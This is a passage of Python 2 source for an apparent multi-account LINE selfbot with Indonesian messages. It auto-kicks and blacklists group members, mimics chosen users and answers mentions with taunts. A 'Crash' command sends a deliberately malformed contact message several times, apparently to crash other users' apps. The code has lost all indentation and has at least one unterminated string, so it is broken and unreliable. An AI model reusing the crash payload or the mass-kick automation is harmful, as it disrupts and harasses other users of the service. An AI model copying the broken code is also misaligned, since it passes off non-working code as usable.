aa = (aa[:int(len(aa)-1)])
msg = Message()
msg.to = to
msg.text = "「Mention」\n"+bb
msg.contentMetadata = {'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'}
#print msg
try:
kr1.sendMessage(msg)
except Exception as error:
print error
def summon(to, nama):
aa = ""
bb = ""
strt = int(14)
akh = int(14)
nm = nama
for mm in nm:
akh = akh + 2
aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
strt = strt + 6
akh = akh + 4
bb += "\xe2\x95\xa0 @x \n"
aa = (aa[:int(len(aa)-1)])
msg = Message()
msg.to = to
msg.text = "\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\n"+bb+"\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90"
msg.contentMetadata ={"MENTION":'{"MENTIONEES":['+aa+']}','EMTVER':'4'}
print "[Command] Tag All"
try:
kr1.sendMessage(msg)
except Exception as error:
print error
def removeAllMessages(self, lastMessageId):
return self._kr1.removeAllMessages(0, lastMessageId)
def cms(string, commands): #/XXX, >XXX, ;XXX, ^XXX, %XXX, $XXX...
tex = ["+","@","/",">",";","^","%","$","^","サテラ:","サテラ:","サテラ:","サテラ:"]
for tex in tex:
for command in commands:
if string ==command:
return True
def sendText(self, Tomid, text):
msg = Message()
msg.to = Tomid
msg.text = text
def sendMessage(self, Tomid, msg):
msg = Message()
msg.to = Tomid
msg.msg = msg
def bot(op):
try:
if op.type == 0:
return
if op.type == 5:
if wait['autoAdd'] == True:
kr1.findAndAddContactsByMid(op.param1)
if (wait['message'] in [""," ","\n",None]):
pass
else:
kr1.sendText(op.param1,str(wait['message']))
#==========================[WIB]===========================
if op.type == 26:
msg = op.message
if msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True:
text = msg.text
if text is not None:
kr1.sendText(msg.to,text)
#==========================[WIB]===========================
if op.type == 32:
if wait["Protectcancel"] == True:
if op.param2 in admin and Bots:
pass
if op.param2 not in admin:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
#==========================[WIB]===========================
if op.type == 13:
if wait["Protectguest"] == True:
if op.param2 in admin and Bots:
pass
if op.param2 not in admin:
random.choice(KAC).cancelGroupInvitation(op.param1,[op.param3])
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
#==========================[WIB]===========================
if op.type == 19:
if wait["MProtection"] == True:
if op.param2 in admin and Bots:
pass
if op.param2 not in admin:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
#==========================[WIB]===========================
if op.type == 11:
if wait["QrProtect"] == True:
if op.param2 in admin and Bots:
pass
if op.param2 not in admin:
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = True
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
random.choice(KAC).kickoutFromGroup(op.param1,[op.param3])
kr1.updateGroup(G)
kr2.updateGroup(G)
if op.type == 11:
if wait["Protectgr"] == True:
if kr1.getGroup(op.param1).preventJoinByTicket == False:
if op.param2 in Bots:
pass
if op.param2 in admin:
pass
else:
try:
random.choice(KAC).sendText(op.param1,random.choice(KAC).getContact(op.param2).displayName + "Jangan Buka Kode QR Woyyyyy...!!!")
kr1.kickoutFromGroup(op.param1,[op.param2])
X = kr1.getGroup(op.param1)
X.preventJoinByTicket = True
kr1.updateGroup(X)
except:
random.choice(KAC).sendText(op.param1,random.choice(KAC).getContact(op.param2).displayName + "Jangan Buka Kode QR Woyyyyy...!!!")
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
Z = random.choice(KAC).getGroup(op.param1)
Z.preventJoinByTicket = True
random.choice(KAC).updateGroup(Z)
#==========================[WIB]===========================
if op.type == 11:
if op.param3 == '1':
if op.param1 in wait['pname']:
try:
G = kr1.getGroup(op.param1)
except:
try:
G = kr2.getGroup(op.param1)
except:
try:
G = kr3.getGroup(op.param1)
except:
pass
G.name = wait['pro_name'][op.param1]
try:
kr1.updateGroup(G)
except:
try:
kr2.updateGroup(G)
except:
try:
kr3.updateGroup(G)
except:
pass
if op.param2 in admin or Bots:
pass
else:
try:
kr1.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kr2.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kr3.kickoutFromGroup(op.param1,[op.param2])
except:
pass
kr1.sendText(op.param1,"please do not change group name-_-")
#==========================[WIB]===========================
if op.type == 13:
print op.param3
if op.param3 in mid:
if op.param2 in admin or owner:
kr1.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in admin or owner:
kr2.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in admin or owner:
kr3.acceptGroupInvitation(op.param1)
#==========================[WIB]===========================
if op.param3 in mid:
if op.param2 in Amid:
kr1.acceptGroupInvitation(op.param1)
if op.param3 in mid:
if op.param2 in Bmid:
kr1.acceptGroupInvitation(op.param1)
#==========================[WIB]===========================
if op.param3 in Amid:
if op.param2 in mid:
kr2.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 in Bmid:
kr2.acceptGroupInvitation(op.param1)
#==========================[WÌB]===========================
if op.param3 in Bmid:
if op.param2 in mid:
kr3.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 in Amid:
kr3.acceptGroupInvitation(op.param1)
#==========================[WIB]===========================
if op.type == 13:
if mid in op.param3:
if wait['autoJoin'] == True:
if op.param2 in admin or owner:
kr1.acceptGroupInvitation(op.param1)
else:
kr1.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Amid in op.param3:
if wait['autoJoin'] == True:
if op.param2 in admin or owner:
kr2.acceptGroupInvitation(op.param1)
else:
kr2.acceptGroupInvitation(op.param1)
kr2.kickoutFromGroup(op.param1,[op.param2])
kr2.leaveGroup(op.param1)
else:
print "autoJoin is Off"
if Bmid in op.param3:
if wait['autoJoin'] == True:
if op.param2 in admin or owner:
kr3.acceptGroupInvitation(op.param1)
else:
kr3.acceptGroupInvitation(op.param1)
kr3.kickoutFromGroup(op.param1,[op.param2])
kr3.leaveGroup(op.param1)
else:
print "autoJoin is Off"
#==========================[WIB]===========================
if op.type == 19:
if wait["autoKick"] == True:
if op.param2 in admin or Bots:
pass
else:
try:
kr3.kickoutFromGroup(op.param1,[op.param2])
kr1.inviteIntoGroup(op.param1,[op.param3])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in admin or Bots:
pass
else:
wait["blacklist"][op.param2] = True
#==========================[WIB]===========================
if mid in op.param3:
if op.param2 in Bots or admin:
pass
else:
try:
kr2.kickoutFromGroup(op.param1,[op.param2])
kr3.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = kr3.getGroup(op.param1)
G.preventJoinByTicket = False
kr3.updateGroup(G)
Ti = kr3.reissueGroupTicket(op.param1)
kr1.acceptGroupInvitationByTicket(op.param1,Ti)
kr2.acceptGroupInvitationByTicket(op.param1,Ti)
kr3.acceptGroupInvitationByTicket(op.param1,Ti)
G = kr1.getGroup(op.param1)
G.preventJoinByTicket = True
kr1.updateGroup(G)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Amid in op.param3:
if op.param2 in Bots or admin:
pass
else:
try:
kr3.kickoutFromGroup(op.param1,[op.param2])
kr1.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = kr1.getGroup(op.param1)
G.preventJoinByTicket = False
kr1.updateGroup(G)
Ti = kr1.reissueGroupTicket(op.param1)
kr1.acceptGroupInvitationByTicket(op.param1,Ti)
kr2.acceptGroupInvitationByTicket(op.param1,Ti)
kr3.acceptGroupInvitationByTicket(op.param1,Ti)
G = kr2.getGroup(op.param1)
G.preventJoinByTicket = True
kr2.updateGroup(G)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
if Bmid in op.param3:
if op.param2 in Bots or admin:
pass
else:
try:
kr1.kickoutFromGroup(op.param1,[op.param2])
kr2.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group\ngid=["+op.param1+"]\nmid=["+op.param2+"]")
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
G = kr2.getGroup(op.param1)
G.preventJoinByTicket = False
kr2.updateGroup(G)
Ti = kr2.reissueGroupTicket(op.param1)
kr1.acceptGroupInvitationByTicket(op.param1,Ti)
kr2.acceptGroupInvitationByTicket(op.param1,Ti)
kr3.acceptGroupInvitationByTicket(op.param1,Ti)
G = kr3.getGroup(op.param1)
G.preventJoinByTicket = True
kr3.updateGroup(G)
if op.param2 in wait["blacklist"]:
pass
else:
if op.param2 in Bots:
pass
else:
wait["blacklist"][op.param2] = True
#==========================[WIN]===========================
if op.type == 19:
if op.param3 in admin:
if op.param2 not in admin:
try:
kr3.kickoutFromGroup(op.param1,[op.param2])
kr1.inviteIntoGroup(op.param1,[op.param3])
wait["blacklist"][op.param2] = True
except:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
wait["blacklist"][op.param2] = True
if op.param3 not in admin:
if op.param2 not in admin:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
if op.param3 in admin:
if op.param2 in admin:
try:
kr1.inviteIntoGroup(op.param1,[op.param3])
random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
except:
random.choice(KAC).inviteIntoGroup(op.param1,[admin])
random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
if op.type == 19:
if op.param3 in mid:
if op.param2 not in admin:
try:
kr3.kickoutFromGroup(op.param1,[op.param2])
mid = ["u0710a42a75e0a476ad687639db8c069c"]
midd1 = (mid)
kr2.findAndAddContactsByMid(midd1)
kr2.inviteIntoGroup(op.param1,[midd1])
kr1.acceptGroupInvitation(op.param1)
except:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
mid = ["u0710a42a75e0a476ad687639db8c069c"]
midd1 = (mid)
random.choice(KAC).findAndAddContactsByMid(midd1)
random.choice(KAC).inviteIntoGroup(op.param1,[midd1])
kr1.acceptGroupInvitation(op.param1)
if op.param3 in Amid:
if op.param2 not in admin:
try:
kr1.kickoutFromGroup(op.param1,[op.param2])
Amid = ["u0710a42a75e0a476ad687639db8c069c"]
midd2 = (Amid)
kr3.findAndAddContactsByMid(midd2)
kr3.inviteIntoGroup(op.param1,[midd2])
kr2.acceptGroupInvitation(op.param1)
except:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
Amid = ["u0710a42a75e0a476ad687639db8c069c"]
midd2 = (Amid)
random.choice(KAC).findAndAddContactsByMid(midd2)
random.choice(KAC).inviteIntoGroup(op.param1,[midd2])
kr2.acceptGroupInvitation(op.param1)
if op.param3 in Bmid:
if op.param2 not in admin:
try:
kr2.kickoutFromGroup(op.param1,[op.param2])
Bmid = [""]
midd3 = (Bmid)
kr1.findAndAddContactsByMid(midd3)
kr1.inviteIntoGroup(op.param1,[midd3])
kr3.acceptGroupInvitation(op.param1)
except:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
Bmid = [""]
midd3 = (Bmid)
random.choice(KAC).findAndAddContactsByMid(midd3)
random.choice(KAC).inviteIntoGroup(op.param1,[midd3])
kr3.acceptGroupInvitation(op.param1)
#==========================[WIB]===========================
if op.type == 19:
if mid in op.param3:
wait["blacklist"][op.param2] = True
#==========================[WIB]===========================
if op.type == 22:
if wait['leaveRoom'] == True:
kr1.leaveRoom(op.param1)
kr2.leaveRoom(op.param1)
kr3.leaveRoom(op.param1)
#==========================[WIB]===========================
if op.type == 24:
if wait['leaveRoom'] == True:
kr1.leaveRoom(op.param1)
kr2.leaveRoom(op.param1)
kr3.leaveRoom(op.param1)
#==========================[WIB]===========================
if op.type == 26:
msg = op.message
if msg.toType == 1:
if wait['leaveRoom'] == True:
kr1.leaveRoom(msg.to)
kr2.leaveRoom(msg.to)
kr3.leaveRoom(msg.to)
#==========================[WIB]===========================
if msg.contentType == 16:
url = msg.contentMetadata["postEndUrl"]
kr1.like(url[25:58], url[66:], likeType=1001)
#==========================[WIB]===========================
if op.type == 26:
msg = op.message
if msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True:
text = msg.text
if text is not None:
kr1.sendText(msg.to,text)
if op.type == 26:
msg = op.message
if msg.to in settings["simiSimi"]:
if settings["simiSimi"][msg.to] == True:
if msg.text is not None:
text = msg.text
r = requests.get("http://api.ntcorp.us/chatbot/v1/?text=" + text.replace(" ","+") + "&key=beta1.nt")
data = r.text
data = json.loads(data)
if data["status"] == 200:
if data['result']['result'] == 100:
kr1.sendText(msg.to, "[From Simi]\n" + data['result']['response'].encode('utf-8'))
#==========================[WIB]===========================
if op.type in [26,25]:
msg = op.message
if msg.contentType == 7:
if wait['stiker'] == True:
stk_id = msg.contentMetadata['STKID']
stk_ver = msg.contentMetadata['STKVER']
pkg_id = msg.contentMetadata['STKPKGID']
filler = "[Stiker Check] \nSTKID : %s\nSTKPKGID : %s \nSTKVER : %s\n =>> Link...\nline://shopdetail/%s"%(stk_id,pkg_id,stk_ver,pkg_id)
kr1.sendText(msg.to, filler)
else:
pass
#==========================[WIB]===========================
if op.type == 26:
msg = op.message
if "MENTION" in msg.contentMetadata.keys() != None:
if wait['detectMention'] == True:
contact = kr1.getContact(msg.from_)
cName = contact.displayName
balas = [cName + ngetag mulu lu ngtd?",cName + " nah mending pc aja klo penting..!", "kenapa, ", cName + " kangen ya?","kangen bilang, gak usah ngetag mulu, " + cName, "Kalo gak ada urusan jangan ngetag ngtd " + cName, "Tuh kan" + cName + "Caper lu"]
ret_ = "[Auto Respon] " + random.choice(balas)
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata["MENTION"])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention['M'] in Bots:
kr1.sendText(msg.to,ret_)
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "22926163",
"STKPKGID": "9800",
"STKVER": "1" }
kr1.sendMessage(msg)
break
#==========================[WIB]===========================
if "MENTION" in msg.contentMetadata.keys() != None:
if wait['potoMention'] == True:
contact = kr1.getContact(msg.from_)
cName = contact.pictureStatus
balas = ["http://dl.profile.line-cdn.net/" + cName]
ret_ = random.choice(balas)
mention = ast.literal_eval(msg.contentMetadata["MENTION"])
mentionees = mention["MENTIONEES"]
for mention in mentionees:
if mention["M"] in Bots:
kr1.sendImageWithURL(msg.to,ret_)
break
#==========================[WIB]===========================
if "MENTION" in msg.contentMetadata.keys() != None:
if wait['kickMention'] == True:
contact = kr1.getContact(msg.from_)
cName = contact.displayName
balas = [cName + "ngetag mulu lu ngtd?",cName + " nah mending pc aja klo penting..!", "kenapa, ", cName + " kangen ya?","kangen bilang, gak usah ngetag mulu, " + cName, "Caper lu " + cName, "Tuh kan" + cName + "gak ada urusan gak usah ngetag ngtd"]
ret_ = "[Auto Respon] " + random.choice(balas)
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata["MENTION"])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention['M'] in Bots:
kr1.sendText(msg.to,ret_)
kr1.kickoutFromGroup(msg.to,[msg.from_])
kr1.inviteIntoGroup(msg.to, admin)
break
#==========================[WIB]===========================
if op.type in [26,25]:
msg = op.message
if msg.contentType == 13:
if wait['invite'] == True:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = kr1.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
kr1.sendText(msg.to, _name + " Berada DiGrup Ini")
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
kr1.findAndAddContactsByMid(target)
kr1.inviteIntoGroup(msg.to,[target])
kr1.sendText(msg.to,"Invite " + _name)
wait['invite'] = False
break
except:
kr1.sendText(msg.to,"Error")
wait['invite'] = False
break
if msg.contentType == 13:
if wait['invite2'] == True:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = random.choice(KAC).getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
random.choice(KAC).sendText(msg.to, _name + " Berada DiGrup Ini")
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
random.choice(KAC).findAndAddContactsByMid(target)
random.choice(KAC).inviteIntoGroup(msg.to,[target])
random.choice(KAC).sendText(msg.to,"Invite2 " + _name)
wait['invite2'] = False
break
except:
random.choice(KAC).sendText(msg.to,"Error")
wait['invite2'] = False
break
#==========================[WIB]===========================
if op.type in [26,25]:
msg = op.message
if msg.contentType == 13:
if wait["winvite"] == True:
if msg.from_ in admin or owner:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = kr1.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
kr1.sendText(msg.to,"-> " + _name + " ada di room ini")
break
elif invite in wait["blacklist"]:
kr1.sendText(msg.to,"Maaf, " + _name + " kena Blacklist")
kr1.sendText(msg.to,"hubungi owner kami ya !, \n➡Unban: " + invite)
break
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
kr1.findAndAddContactsByMid(target)
kr1.inviteIntoGroup(msg.to,[target])
kr1.sendText(msg.to,"Selesai di Invite : \n➡" + _name)
wait["winvite"] = False
break
except:
try:
kr1.findAndAddContactsByMid(invite)
kr1.inviteIntoGroup(op.param1,[invite])
wait["winvite"] = False
except:
kr1.sendText(msg.to,"Negative, Error detected")
wait["winvite"] = False
break
#==========================[WIB]===========================
if msg.from_ in admin or owner:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = kr2.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
kr2.sendText(msg.to,"-> " + _name + " ada di room ini")
break
elif invite in wait["blacklist"]:
kr2.sendText(msg.to,"Maaf, " + _name + " kena Blacklist")
kr2.sendText(msg.to,"hubungi owner kami ya !, \n➡Unban: " + invite)
break
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
kr2.findAndAddContactsByMid(target)
kr2.inviteIntoGroup(msg.to,[target])
kr2.sendText(msg.to,"Selesai di Invite : \n➡" + _name)
wait["winvite"] = False
break
except:
try:
kr2.findAndAddContactsByMid(invite)
kr2.inviteIntoGroup(op.param1,[invite])
wait["winvite"] = False
except:
kr2.sendText(msg.to,"Negative, Error detected")
wait["winvite"] = False
break
#==========================[WIB]===========================
if op.type == 26:
msg = op.message
if msg.contentType == 13:
#==========================[WIB]===========================
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
kr1.sendText(msg.to,"In Blacklist")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
kr1.sendText(msg.to,"Nothing")
#==========================[WIB]===========================
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
kr1.sendText(msg.to,"Done")
wait["dblack"] = False
else:
wait["dblack"] = False
kr1.sendText(msg.to,"Not in Blacklist")
#==========================[WIB]===========================
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
kr1.sendText(msg.to,"In Blacklist")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
kr1.sendText(msg.to,"Done")
#==========================[WIB]===========================
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
kr1.sendText(msg.to,"Done")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
kr1.sendText(msg.to,"Done")
#==========================[WIB]===========================
elif wait['contact'] == True:
msg.contentType = 0
kr1.sendText(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = kr1.getContact(msg.contentMetadata["mid"])
try:
cu = kr1.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
kr1.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
else:
contact = kr1.getContact(msg.contentMetadata["mid"])
try:
cu = kr1.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
kr1.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
#==========================[WIB]===========================
elif msg.contentType == 16:
if wait['timeline'] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "menempatkan URL\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = msg.contentMetadata["postEndUrl"]
kr1.sendText(msg.to,msg.text)
#==========================[WIB]===========================
elif msg.text is None:
return
#==========================[WIB]===========================
elif msg.text in ["help","Help"]:
#if msg.from_ in admin:
if wait["lang"] == "JP":
kr1.sendText(msg.to,helpmsg)
kr1.sendImageWithURL(msg.to)
kr1.sendText(msg.to,"↥↥↥↥↥↪ Owner Bots ↩↥↥↥↥↥")
else:
kr1.sendText(msg.to,helpmsg)
#==========================[WIB]===========================
elif msg.text in ["key",".."]:
#if msg.from_ in admin:
if wait["lang"] == "JP":
kr1.sendText(msg.to,keymsg)
else:
kr1.sendText(msg.to,keymsg)
#==========================[WIB]===========================
elif msg.text in ["keypro",".."]:
#if msg.from_ in admin:
if wait["lang"] == "JP":
kr1.sendText(msg.to,helppro)
else:
kr1.sendText(msg.to,helppro)
#==========================[WIB]===========================
elif msg.text in ["keyself","Oswib1"]:
#if msg.from_ in admin:
if wait["lang"] == "JP":
kr1.sendText(msg.to,helpself)
else:
kr1.sendText(msg.to,helpself)
#==========================[WIB]===========================
elif msg.text in ["keygrup","Oswib2"]:
#if msg.from_ in admin:
if wait["lang"] == "JP":
kr1.sendText(msg.to,helpgrup)
else:
kr1.sendText(msg.to,helpgrup)
#==========================[WIB]===========================
elif msg.text in ["keyset","Oswib3"]:
#if msg.from_ in admin:
if wait["lang"] == "JP":
kr1.sendText(msg.to,helpset)
else:
kr1.sendText(msg.to,helpset)
#==========================[WIB]===========================
elif msg.text in ["keymedia",".."]:
#if msg.from_ in admin:
if wait["lang"] == "JP":
kr1.sendText(msg.to,helptranslate)
else:
kr1.sendText(msg.to,helptranslate)
#==========================[WIB]===========================
elif msg.text in ["keyrhs","Oswib4"]:
#if msg.from_ in admin:
if wait["lang"] == "JP":
kr1.sendText(msg.to,helprhs)
else:
kr1.sendText(msg.to,helprhs)
#==========================[WIB]===========================
elif msg.text in ["Sp","Speed","speed"]:
#if msg.from_ in admin:
start = time.time()
kr1.sendText(msg.to,"【 ωιϐ τєѕ ѕρєє∂ 】\n🔹️ Type: speed\n🔹️ ૮αℓ૮µℓαƭเɳɠ.............")
elapsed_time = time.time() - start
kr1.sendText(msg.to,"【ωιϐ-ϐοτ ѕρєє∂】\n🔹️ Tipe: Check speed\n🔹️ Time: 0.04 - 0.06 \n🔹️ Speed :%sseconds" % (elapsed_time))
#==========================[WIB]===========================
elif msg.text in ["Crash"]:
#if msg.from_ in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': "u4a361586c55ac4ef218a0a9b78b2f1b3',"}
kr1.sendMessage(msg)
kr1.sendMessage(msg)
kr2.sendMessage(msg)
kr2.sendMessage(msg)
#==========================[WIB]===========================
elif msg.text in ["aku","Aku"]:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.from_}
kr1.sendMessage(msg)
#==========================[WIB]===========================
elif msg.text in ["me","Me"]:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.from_}
kr1.sendMessage(msg)
#==========================[WIB]===========================
elif msg.text in ["bot","Bot"]:
#if msg.from_ in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
kr1.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid}
kr2.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
kr3.sendMessage(msg)
random.choice(KAC).sendImageWithURL(msg.to)
random.choice(KAC).sendText(msg.to,"↥↥↥↥↥↪ Owner Bots ↩↥↥↥↥↥")
#==========================[WIB]===========================
elif "Facebook " in msg.text:
#if msg.from_ in admin:
a = msg.text.replace("facebook ","")
b = urllib.quote(a)
kr1.sendText(msg.to,"「 Mencari 」\n" "Type:Mencari Info\nStatus: Proses")
kr1.sendText(msg.to, "https://www.facebook.com" + b)
kr1.sendText(msg.to,"「 Mencari 」\n" "Type:Mencari Info\nStatus: Sukses")
#==========================[WIB]===========================
elif msg.text in ["mode on","Mode on"]:
#if msg.from_ in admin:
if wait["protect"] == True:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protecion Already On")
else:
kr1.sendText(msg.to,"Protecion Already On")
else:
wait["protect"] = True
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protecion Already On")
else:
kr1.sendText(msg.to,"Protecion Already On")
if wait["linkprotect"] == True:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protection Qr already On")
else:
kr1.sendText(msg.to,"Protection Qr already On")
else:
wait["linkprotect"] = True
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protection Qr already On")
else:
kr1.sendText(msg.to,"Protection Qr already On")
if wait["inviteprotect"] == True:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protection Invite already On")
else:
kr1.sendText(msg.to,"Protection Invite already On")
else:
wait["inviteprotect"] = True
if wait["lang"] == "JP":
kr1.sendText(msg.to,"ρяσтє¢тισи ιиνιтє ѕєт тσ σи")
else:
kr1.sendText(msg.to,"ρяσтє¢тισи ιиνιтє αℓяєα∂у σи")
if wait["cancelprotect"] == True:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи ѕєт тσ σи")
else:
kr1.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи αℓяєα∂у σи")
else:
wait["cancelprotect"] = True
if wait["lang"] == "JP":
kr1.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи ѕєт тσ σи")
else:
kr1.sendText(msg.to,"¢αи¢єℓ ρяσтє¢тισи αℓяєα∂у σи")
if wait["QrProtect"] == True:#<==========
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protect QR On")
else:
kr1.sendText(msg.to,"done")
else:
wait["QrProtect"] = True
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protect QR On")
else:
kr1.sendText(msg.to,"done")
if wait["MProtection"] == True:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Member Protection On")
else:
kr1.sendText(msg.to,"done")
else:
wait["MProtection"] = True
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Member Protection On")
else:
kr1.sendText(msg.to,"done")
if msg.to in wait['pname']:
kr1.sendText(msg.to,"TURN ON")
else:
kr1.sendText(msg.to,"ALREADY ON")
wait['pname'][msg.to] = True
wait['pro_name'][msg.to] = kr1.getGroup(msg.to).name
if wait["Protectcancel"] == True:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"proтecт cancel on")
else:
wait["Protectcancel"] = True
if wait["lang"] == "JP":
kr1.sendText(msg.to,"already on")
if wait["autoKick"] == True:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Kick on")
else:
wait["autoKick"] = True
if wait["lang"] == "JP":
kr1.sendText(msg.to,"already on")
if wait["Protectguest"] == True:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Guest Stranger On")
else:
kr1.sendText(msg.to,"done")
else:
wait["Protectguest"] = True
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Guest Stranger On")
else:
kr1.sendText(msg.to,"done")
if wait["Protectgr"] == True:
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protect Link On")
else:
kr1.sendText(msg.to,"done")
else:
wait["Protectgr"] = True
if wait["lang"] == "JP":
kr1.sendText(msg.to,"Protect Link On")
else:
kr1.sendText(msg.to,"done")
#==========================[Kris]===========================
elif msg.text in ["mode off","Mode off"]:
#if msg.from_ in admin:
